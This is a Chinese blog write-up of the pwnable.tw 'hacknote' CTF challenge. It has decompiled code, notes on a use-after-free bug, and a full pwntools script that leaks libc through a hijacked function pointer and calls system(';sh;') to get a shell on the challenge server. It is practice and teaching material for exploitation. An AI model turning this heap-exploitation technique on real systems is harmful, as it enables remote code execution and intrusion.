pwnable.tw wp - hacknote

最新推荐文章于 2023-09-24 23:34:05 发布
最新推荐文章于 2023-09-24 23:34:05 发布
阅读量228 收藏
点赞数
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33976344/article/details/120400473
版权

前言

pwnable.tw上的hacknote, 与攻防世界的hacknote类似的题目

分析过程

在这里插入图片描述

add函数, 还算合理

unsigned int add()
{
  int v0; // ebx
  int i; // [esp+Ch] [ebp-1Ch]
  int size; // [esp+10h] [ebp-18h]
  char buf[8]; // [esp+14h] [ebp-14h] BYREF
  unsigned int v5; // [esp+1Ch] [ebp-Ch]

  v5 = __readgsdword(0x14u);
  if ( dword_804A04C <= 5 )
  {
    for ( i = 0; i <= 4; ++i )
    {
      if ( !*(&ptr + i) )
      {
        *(&ptr + i) = malloc(8u);
        if ( !*(&ptr + i) )
        {
          puts("Alloca Error");
          exit(-1);
        }
        *(_DWORD *)*(&ptr + i) = sub_804862B;
        printf("Note size :");
        read(0, buf, 8u);
        size = atoi(buf);
        v0 = (int)*(&ptr + i);
        *(_DWORD *)(v0 + 4) = malloc(size);
        if ( !*((_DWORD *)*(&ptr + i) + 1) )
        {
          puts("Alloca Error");
          exit(-1);
        }
        printf("Content :");
        read(0, *((void **)*(&ptr + i) + 1), size);
        puts("Success !");
        ++dword_804A04C;
        return __readgsdword(0x14u) ^ v5;
      }
    }
  }
  else
  {
    puts("Full");
  }
  return __readgsdword(0x14u) ^ v5;
}

delete函数, UAF
在这里插入图片描述
print函数, 通过结构体中的函数指针调用函数, 可以利用
在这里插入图片描述

漏洞利用

UAF修改print指针, 泄露libc, 调用system(";sh;")

from pwn import *

url, port = "chall.pwnable.tw", 10102
filename = "./hacknote"
elf = ELF(filename)
libc = ELF("./libc_32.so.6")
# context(arch="amd64", os="linux")
context(arch="i386", os="linux")

context.log_level="debug"
debug = 0
if debug:
    io = process(filename)
    # context.terminal = ['tmux', 'splitw', '-h']
    # gdb.attach(io)
else:
    io = remote(url, port)

def BK():
    gdb.attach(io)
    pause()

def addnote(size, content):
    io.recvuntil(":")
    io.sendline("1")
    io.recvuntil(":")
    io.sendline(str(size))
    io.recvuntil(":")
    io.sendline(content)

def delnote(idx):
    io.recvuntil(":")
    io.sendline("2")
    io.recvuntil(":")
    io.sendline(str(idx))

def printnote(idx):
    io.sendlineafter(":", "3")
    io.sendlineafter("Index :", str(idx))

def pwn():
    puts_func = 0x0804862B
    puts_got = elf.got["puts"]
    
    addnote(24, "ZZZZ")
    addnote(24, "ZZZZ")
    delnote(0)
    delnote(1)
    addnote(8, p32(puts_func) + p32(puts_got))
    printnote(0)
    content = io.recv()
    print(content)
    puts_addr = u32(content[:4])
    libc_base = puts_addr - libc.sym["puts"]
    system_addr = libc.sym['system'] + libc_base
    log.info("puts address: %#x" % puts_addr)
    log.info("system address: %#x" % system_addr)

    delnote(2)
    addnote(8, p32(system_addr) + b";sh;")
    printnote(0)
    
    io.interactive()


if __name__ == "__main__":
    pwn()

在这里插入图片描述

总结

心得

(1) system() 可以直接用 “sh”
(2) execve() 只能完整路径 “/bin/sh”

卡点

(1) 网络不稳定, 可能会有io的"条件竞争", 在接受提示之前就发送了选择, 导致io出错, 本来可以打通, 结果打不通, 所以建议sendlineafter()

参考

HWS2020夏令营录播

fa1c4
关注
专栏目录
pwnable.tw——hacknote
40KO的博客
02-24 835
很少做pwn,之前也只懂点rop,现在跟着练练pwn的堆利用吧,pwnable.tw上的一题hacknote,比较纯粹的uaf题目,还好不久前看了点glibc内存管理的东西,可以派上用场了。 逆向很轻松,那为什么不直接给源码呢。。。根据add_note函数很容易了解note的结构体特征 unsigned int add_node() { note *v0; // ebx signed...
pwnable.tw 1~5 心累
qq_42192672的博客
12-02 631
听说很难,来找虐 1.Start [100 pts] 之前湖湘杯有一题啥防护措施都没开启,我就不会做,所以不敢开心的太早 拖进IDA,这啥东西 还是直接看汇编吧 这是个系统调用 大概就是系统中断之后直接调用吧,边上有注释,不然我直接凉了 来,看一下汇编 先把地址给ecx,给了给长度范围,饭后执行标准输出,输出到终端,然后执行写操作 进入写函数以后,标准读入,长度还是2...
hacknote.zip
12-30
本题目是攻防世界一道6分的堆漏洞题目,在ctf wiki上面有比较详细的解析和漏洞利用,几乎一模一样,但区别是这道题没有后门函数,所以漏洞利用的方式发生了变化,推荐大家动手分析。
pwnable.tw hacknote
weixin_30284355的博客
03-22 127
产生漏洞的原因是free后chunk未置零 unsigned int sub_80487D4() { int index; // [esp+4h] [ebp-14h] char buf; // [esp+8h] [ebp-10h] unsigned int v3; // [esp+Ch] [ebp-Ch] v3 = __readgsdword(0x14u); ...
pwnable.twhacknote
qq_35429581的博客
10-13 2918
uaf漏洞产生的主要原因是释放了一个堆块后,并没有将该指针置为NULL,这样导致该指针处于悬空的状态(有的地方翻译为迷途指针),同样被释放的内存如果被恶意构造数据,就有可能会被利用。 再怎么表述起始还不如真的拿一道题自己调自己看内存看堆状态来的好理解。这也是我觉得ctf-pwn的意义所在,可以把一些漏洞抽象出来以题的形式,作为学习这方面的一个抓手。 此篇尽量做的细致基础,但仍然假设读者已经初步
hacknote
m0_48127441的博客
04-23 134
0x0804A050 指针数组 32位 1.alloc malloc(0x8) == >chunk(0x10) struct note {函数地址,内容指针} malloc(size) 2.del free(note.内容指针) free(note) 3.print s[idx](s[idx]) 4.exit free(fas...
pwnable.kr-bof WP
Casuall的博客
03-24 5437
pwnable.kr-bof   这道题是一个简单的缓冲器溢出的题,首先要做这道题要对函数调用栈有一定的了解。 函数调用栈是指程序运行时内存一段连续的区域,用来保存函数运行时的状态信息,包括函数参数与局部变量等。称之为“栈”是因为发生函数调用时,调用函数(caller)的状态被保存在栈内,被调用函数(callee)的状态被压入调用栈的栈顶;在函数调用结束时,栈顶的函数(callee)状态被弹出,栈...
攻防世界-PWN进阶区-hacknote(pwnable.tw)
weixin_44145820的博客
03-04 629
攻防世界中这道题是pwnable.tw上面的原题,虽然在攻防世界上难度为7星,不过实际上这题不算难,只需要利用UAF就可以完成。 题目分析 题目链接:https://pan.baidu.com/s/1T-mIVLkxvyZ_7VvlBuInZQ 提取码:azyd checksec: 保护机制比前几题弱了很多 main: hacknote实现了三个功能: 1.添加(上限为5) 在新建no...
SVN客户端官方繁体汉化包LanguagePack_1.10.0.28176-x64-zh_TW.msi
04-17
SVN客户端官方繁体汉化包LanguagePack_1.10.0.28176-x64-zh_TW.msi
pwnable.tw unexploitable writeup
【xiaoxiaorenwu's blog】
04-07 588
花了将近一天半的时间研究这一题,因为最近在熟练srop技术,所以在看到pwnbale.kr上的那道unexploitable之后,想趁热打铁来试试这道500p的题目。收货颇丰啊~~~ 虽然看了网上的思路,但exp还是自己搞了出来,还是有点小小成就感。 题目的二进制文件和libc自己去网站上找吧pwnable.tw. 首先拿到题目我们看到没有了syscall,变为了call read,这个变化导致...
Pwnable.tw WP
AlexYoung28的博客
08-18 879
Pwnable.tw start 我们分析上图程序的汇编代码: 上图中的第一个方框,其实是将 : Let's start the CTF:  这句字符串压进栈; 第二个方框:其实是 system_write()函数, 参数中 fd =1, 说明是标准输出,也就是将 字符串打印输出在屏幕上; 第三个方框: 其实 标准输入函数,允许输入的长度是 3ch 也就是 60个字节; 但是buffe...
(攻防世界)(pwnhacknote
PLpa的博客
07-31 3416
use after free 堆!堆!堆! 终于对堆的结构有了一定的了解,开始做堆的题目,恰巧攻防世界xctf中有这么一题可以练练手,还是挺不错的。。。 对于use after free呢,这里有ctf-wiki的学习资料:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/use_after_free-zh/ 写的非常详细,很实用...
Pwnable.kr WP
AlexYoung28的博客
08-13 945
近期,开始将以前做的CTF的题目,全部整理一遍,写个WP,也是为了督促自己,还需要学的东西还有很多。 Pwnable.kr fd  我们首先看到这道题的C源码: 需要得到flag,则需要执行 system("/bin/cat flag"); 则 必须 buf = "LETMEWIN"。 read(fd, buf, 32)函数中的三个参数中: fd == 0时:则表示标准输入; ...
pwnable.twhacknote
qq_61670993的博客
09-24 94
UAF
pwnable.kr-lotto WP
Casuall的博客
05-26 235
源码如下: #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> unsigned char submit[6]; void play(){ int i; printf("Submit your 6 lotto bytes : "); ...
pwnable[fd](WP)
m0_52249553的博客
05-09 210
文章目录题目简介保护措施源码分析程序利用流程解法 题目简介 关于read函数的一道程序题 保护措施 远程服务器好像不给我们访问flag的权限 源码分析 fd.c的源码如下 #include <stdio.h> #include <stdlib.h> #include <string.h> char buf[32]; int main(int argc, char* argv[], char* envp[]){ if(argc<2){
攻防世界 —— hacknote
qq_41696518的博客
07-19 1624
攻防世界——hacknote
pwnable.kr BOF wp
moep0的博客
10-28 272
放到ida里面反编译一下 gets不要太明显(gets不会对输入的字符串长度进行判断) 这个时候我发现,原来有源码。。。 没关系,拿ida看一下overflowmw和key的位置 发现相差52个byte 第一次写exp,找了一份大佬的 运行一下 成功 ...
pwnable_hacknote_WP
weixin_56434818的博客
03-01 849
pwnable_hacknote_WP 文章目录pwnable_hacknote_WP检查保护分析ELFAdd noteDelete notePrint note利用思路exp 检查保护 ​ i386架构,RELRO半开,开了Canary和NX,没开PIE。 分析ELF 先跑一下 类似菜单的程序,有增、删、查的操作。 IDA反编译后发现主函数主要就是根据选项选择菜单内相应功能的作用,若输入范围之外的数字则会出现错误提示并重新选择。(因为主函数逻辑不是很复杂所以这里就不贴反编译出来的代码了) Add no
字符间隔.----Tw: 设置单词间隔.----Tz: 设置水平缩放.----TL: 设置Leading.----Tf: 设置文本字体.----Tr: 设置Render(渲
最新发布
07-01
2. 单词间隔(Word Spacing, Tw): 指的是单词之间的间距,即单词末尾和下一个单词开头之间的空白。在InDesign中,这个设置通常在“Type” > “Tracking” 或者使用快捷键Ctrl+T(Windows/Linux)或Command+T(Mac)...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值